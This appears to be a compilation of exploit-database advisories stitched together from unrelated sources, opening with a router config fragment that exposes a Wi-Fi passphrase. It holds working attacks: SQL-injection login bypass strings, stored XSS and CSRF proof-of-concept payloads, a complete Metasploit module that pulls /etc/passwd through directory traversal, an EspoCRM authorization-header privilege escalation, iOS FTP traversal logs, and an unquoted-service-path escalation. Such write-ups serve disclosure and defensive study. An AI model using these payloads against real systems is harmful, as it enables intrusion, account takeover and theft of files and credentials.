var mirrorTbl = "";
var secModeTbl = new Array("2");
var enable1XTbl = new Array("0");
var _1xMode = "0";
var wepTbl = new Array("0");
var keyTypeTbl = new Array("1");
var wpaCipherTbl = new Array("2");
var pskFormatTbl = new Array("0");
var pskValueTbl = new Array("wifipass123.");
var defaultKeyIdTbl=new Array("0");
var rsIp= "";
var rsPort= "1812";
var rsPassword= "";
--
Besim ALTINOK
*Security Engineer*
# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here:
Insert user registration information to the DB without filtering.
if(isset($_POST['signup']))
{
$fname=$_POST['fname'];
$lname=$_POST['lname'];
$email=$_POST['email'];
$password=$_POST['password'];
$contact=$_POST['contact'];
$enc_password=$password;
$msg=mysqli_query($con,"insert into
users(fname,lname,email,password,contactno)
values('$fname','$lname','$email','$enc_password','$contact')");
if($msg)
{
echo "<script>alert('Register successfully');</script>";
}
}
2- In the admin dashboard:
Get fullName from DB and print it without any filtering
<?php $ret=mysqli_query($con,"select * from users");
$cnt=1;
while($row=mysqli_fetch_array($ret))
{?>
<tr>
<td><?php echo $cnt;?></td>
<td><?php echo $row['fname'];?></td>
<td><?php echo $row['lname'];?></td>
<td><?php echo $row['email'];?></td>
<td><?php echo $row['contactno'];?></td> <td><?php echo
$row['posting_date'];?></td>
</tr>
4- If we insert value of the "fname" as "script>prompt(1)</script>", we can
perform this attack as "Stored XSS"
# Exploit Title: User Management System 2.0 - Authentication Bypass
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here (admin login: /admin/index.php):
<?php
session_start();
include("dbconnection.php");
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE
username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
{
$extra="manage-users.php";
$_SESSION['login']=$_POST['username'];
$_SESSION['id']=$num['id'];
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
else
{
$_SESSION['action1']="*Invalid username or password";
$extra="index.php";
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
}
2- We can bypass authentication with SQLi:
Bypass code (user and admin login panel):
Username: pentester' or'1'=1#
Password : pentester' or'1'=1#
Finally: There is a lot of SQLi input in this project. Like, login,
registration, forgot password ...
# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
*************************************************
Detail:
You can perform CSRF Attack for all the functions.
----------------------------------------------
CSRF PoC for Delete User
----------------------------------------------
This request performs over the GET request with uid.
------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/admin/manage-users.php">
<input type="hidden" name="uid" value="4" />
<input type="hidden" name="" value="" />
<input type="hidden" name="action" value="del" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Complaint Management System 4.2 - Authentication Bypass
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here:
if(isset($_POST['submit']))
{
$username=$_POST['username'];
$password=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE
username='$username' and password='$password'");
$num=mysqli_fetch_array($ret);
if($num>0)
{
$extra="change-password.php";//
$_SESSION['alogin']=$_POST['username'];
$_SESSION['id']=$num['id'];
$host=$_SERVER['HTTP_HOST'];
$uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\');
header("location:http://$host$uri/$extra");
exit();
}
2- We can bypass authentication with SQLi:
Bypass code (admin login panel):
Username: pentester' or'1'=1#
Password : pentester' or'1'=1#
Finally: There is a lot of SQLi input in this project. Like, login,
registration, forgot password ...
-----------------------------------
# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here: http://localhost/cms/users/registration.php
2- Vulnerable code:
Insert user registration information to the DB without filtering.
if(isset($_POST['submit']))
{
$fullname=$_POST['fullname'];
$email=$_POST['email'];
$password=md5($_POST['password']);
$contactno=$_POST['contactno'];
$status=1;
$query=mysqli_query($con,"insert into
users(fullName,userEmail,password,contactNo,status)
values('$fullname','$email','$password','$contactno','$status')");
$msg="Registration successfull. Now You can login !";
}
?>
3- In the admin dashboard:
Get fullName from DB and print it without any filtering
<tr>
<td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td>
</tr>
4- If we insert "fullName" as "script>prompt(2)</script>", we can perform
this attack as "Stored XSS"
5- Picture in the Attachemnt
---------------------------------------------------
# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation
# Date: 2020-04-22
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://kaasoft.pro/
# Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281
# Product Version: v2.2.0
# Product : Library CMS
# Vulernability Type : Broken Authentication
# Vulenrability : Session Fixation
# CVE : N/A
# Description :
Session Fixation vulnerability has been discovered in v2.2.0
version of Library CMS Powerful Book Management System.
Admin HTTP Request :
POST /admin/login HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://XXX.XXX.XXX.XXX/admin/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
Upgrade-Insecure-Requests: 1
login=USERNAME&password=PASSWORD
Member HTTP Request :
POST /admin/login HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://XXX.XXX.XXX.XXX/admin/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
Upgrade-Insecure-Requests: 1
login=USERNAME&password=PASSWORD
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Zen Load Balancer Directory Traversal",
'Description' => %q{
This module exploits a authenticated directory traversal
vulnerability in Zen Load
Balancer `v3.10.1`. The flaw exists in 'index.cgi' not
properly handling 'filelog='
parameter which allows a malicious actor to load arbitrary file path.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Basim Alabdullah', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'References' =>
[
['EDB', '48308']
],
'DisclosureDate' => "Apr 10 2020"
))
register_options(
[
Opt::RPORT(444),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
OptString.new('FILEPATH', [false, 'The name of the file to
download', '/etc/passwd']),
OptString.new('TARGETURI', [true, "The base URI path of the
ZenConsole install", '/']),
OptString.new('HttpUsername', [true, 'The username to use for
the HTTP server', 'admin']),
OptString.new('HttpPassword', [false, 'The password to use for
the HTTP server', 'admin'])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "../" * datastore['DEPTH']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.cgi'),
'vars_get'=>
{
'id' => '2-3',
'filelog' => "#{traversal}#{filename}",
'nlines' => '100',
'action' => 'See logs'
},
'authorization' =>
basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
}, 25)
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
print_good("#{peer} - Downloaded #{res.body.length} bytes")
path = store_loot(
'zenload.http',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end
# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
# Author: Besim ALTINOK
# Vendor Homepage: https://www.espocrm.com
# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
# Version: v5.8.5
# Tested on: Xampp
# Credit: İsmail BOZKURT
-------------
Details:
--------------------------------------------
1- When we sent a request to the /api/v1/App/user, we can see user details
---
First Request:
---------------------------
GET /api/v1/App/user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 *************************
Authorization: Basic *************************************
Espo-Authorization: *************************************
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: auth-token-secret=cdc7f7*********************377;
auth-username=user1; auth-token=3a874a********************************48
----
2- When we decode Basic Authorization and Espo-Authorization and change the
value with another username (like admin) in the first request, we can see
other user information and access like BOSS
----------
3- Some Examples and encode technique
- BASE64:
First type: dXNlcjE6MQ== (user1:1)
Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
# Title: Sky File 2.1.0 iOS - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-21
# Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210
# CVE: N/A
Document Title:
===============
Sky File v2.1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2207
Common Vulnerability Scoring System:
====================================
7.2
Affected Product(s):
====================
Jin Chen
Product: Sky File v2.1.0 - (iOS) Mobile Web Application
(https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210)
Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
1.1
Multiple persistent cross site scripting vulnerabilities has been
discovered in the official Sky File v2.1.0 mobile ios web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The cross site vulnerability is located in the 'createFolder' module.
Remote attackers with access to the ui via wifi are able
to inject own malicious persistent script code to compromise the
web-application or user credentials. The request method to
inject is POST and the attack vector is located on the application-side.
Successful exploitation of the vulnerability results session hijacking,
persistent phishing, persistent external redirects and
application-side manipulation of the web context of the affected and
connected device module.
1.2
A directory traversal web vulnerability has been discovered in the
official Sky File v2.1.0 mobile ios web-application.
The web vulnerability allows an attacker to unauthorized change the path
or directory to access sensitive application data.
The directory / path webvulnerability is located in the local ftp server
configuration and path validation with the insecure
access permissions. Normally the anonymous user account is only able to
move inside the main app folder but not above to the
web-server and root application files. In case of the issue remote
attackers are able to connect with anonymous user account
credentials to the wifi ftp server. After that the attacker can use a
misconfiguration in the ftp server of the app path to
transmit a `/null//` path commands after CWD and CDUP navigation via ftp
client. Thus allows the attacker to finally
unauthorized access the main root application path.
Successful exploitation of the directory traversal vulnerability results
in unauthorized file system access and information disclosure.
Proof of Concept (PoC):
=======================
1.1
The persistent script code inject vulnerability can be exploited by
remote attackers with wifi network access with low user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.
PoC: Payload
%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:10000/create
Mime Type[application/json]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:10000/]
Content-Length[140]
Connection[keep-alive]
POST-Daten:
path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E]
Response Header:
Cache-Control[no-cache]
Content-Length[2]
Content-Type[application/json]
Connection[Close]
Server[GCDWebUploader]
-
Status: 200[OK]
GET
http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E
Mime Type[application/json]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:10000/]
Connection[keep-alive]
Response Header:
Cache-Control[no-cache]
Content-Length[2]
Content-Type[application/json]
Connection[Close]
Server[GCDWebUploader]
-
Status: 200[OK]
GET http://localhost:10000/evil.source
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:10000/]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[GCDWebUploader]
Connection[Close]
1.2
The directory traversal web vulnerability can be exploited by remote
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.
Manual steps to reproduce ...
1. Open the ftp preview the visible folders
2. Jump back to the the following path
/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/
3. Include the payload /(null)// and refresh via list command
4. You are now placed in an empty folder without permission to move
5. Add to /(null)/../ to the path and refresh the client
6. Path traversal successful to access the main app root path (./) that
is normally not accessable
7. Successful reproduce of the path traversal web vulnerability!
PoC: Payload
/(null)// to /(null)/../
--- PoC Sessio Logs (FTP) ---
[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files
[21:52:40] [R] 221 Thank you for using the FTP service on localhost.
[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds)
[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001
[21:52:42] [R] Connected to 192.168.2.116
[21:52:42] [R] 220 iosFtp server ready.
[21:52:42] [R] USER anonymous
[21:52:42] [R] 331 Password required for (null)
[21:52:42] [R] PASS (hidden)
[21:52:42] [R] 230 User (null) logged in.
[21:52:42] [R] SYST
[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912
[21:52:42] [R] FEAT
[21:52:42] [R] 211-Features supported
[21:52:42] [R] UTF8
[21:52:42] [R] 211 End
[21:52:42] [R] OPTS UTF8 ON
[21:52:42] [R] 200 Type set Opts to UTF8.
[21:52:42] [R] PWD
[21:52:42] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
is the current directory.
[21:52:42] [R] CWD /(null)/
[21:52:42] [R] 550 CWD failed.
[21:52:42] [R] PWD
[21:52:42] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
is the current directory.
[21:52:42] [R] PASV
[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252)
[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236
[21:52:42] [R] LIST -al
[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:42] [R] 226 Transfer complete.
[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s)
[21:52:43] [R] CDUP
[21:52:43] [R] 250 CDUP command successful.
[21:52:43] [R] PWD
[21:52:43] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder"
is the current directory.
[21:52:43] [R] PASV
[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51)
[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323
[21:52:43] [R] LIST -al
[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:43] [R] 226 Transfer complete.
[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s)
[21:52:43] [R] CDUP
[21:52:44] [R] 250 CDUP command successful.
[21:52:44] [R] PWD
[21:52:44] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents"
is the current directory.
[21:52:44] [R] PASV
[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51)
[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707
[21:52:44] [R] LIST -al
[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:44] [R] 226 Transfer complete.
[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s)
[21:53:34] [R] CDUP
[21:53:34] [R] 250 CDUP command successful.
[21:53:34] [R] PWD
[21:53:34] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45"
is the current directory.
[21:53:34] [R] PASV
[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14)
[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126
[21:53:34] [R] LIST -al
[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:34] [R] 226 Transfer complete.
[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s)
[21:53:35] [R] CDUP
[21:53:35] [R] 250 CDUP command successful.
[21:53:35] [R] PWD
[21:53:35] [R] 257 "(null)" is the current directory.
[21:53:35] [R] PASV
[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14)
[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718
[21:53:35] [R] LIST -al
[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:35] [R] 226 Transfer complete.
[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s)
[21:53:35] [R] PASV
[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14)
[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622
[21:53:35] [R] LIST -al
[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:35] [R] 226 Transfer complete.
[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s)
[21:53:36] [R] CDUP
[21:53:36] [R] 550 CDUP command failed.
[21:53:41] [R] CWD /etc
[21:53:41] [R] 250 CWD command successful.
[21:53:41] [R] PWD
[21:53:41] [R] 257 "(null)" is the current directory.
[21:53:48] [R] CDUP
[21:53:48] [R] 550 CDUP command failed.
[21:53:51] [R] CWD /
[21:53:51] [R] 250 CWD command successful.
[21:53:51] [R] PWD
[21:53:51] [R] 257 "/" is the current directory.
[21:53:51] [R] PASV
[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173)
[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749
[21:53:51] [R] LIST -al
[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:51] [R] 226 Transfer complete.
[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s)
[21:54:02] [R] TYPE I
[21:54:02] [R] 200 Type set to I.
Listing Path ./root
- Applications
- bin
- cores
- developer
- Library
- private
- sbin
- System
- usr
- etc
- var
- tmp
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path
# Date: 2020-04-24
# Vendor Homepage: https://getpopcorntime.is
# Exploit Authors: Uriel Yochpaz & Jonatan Schor
# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
# Version: 6.2.1.14 and probably prior versions
# Tested on: Windows 10, 7
# CVE : N/A
[+] Description:
Popcorn Time For Windows installs as a service with an unquoted
service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
[+] POC:
C:\Users\User>sc qc "Update service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Update service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[+] Exploit:
A successful attempt would require the local user to be able to insert their
code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe)
folders undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.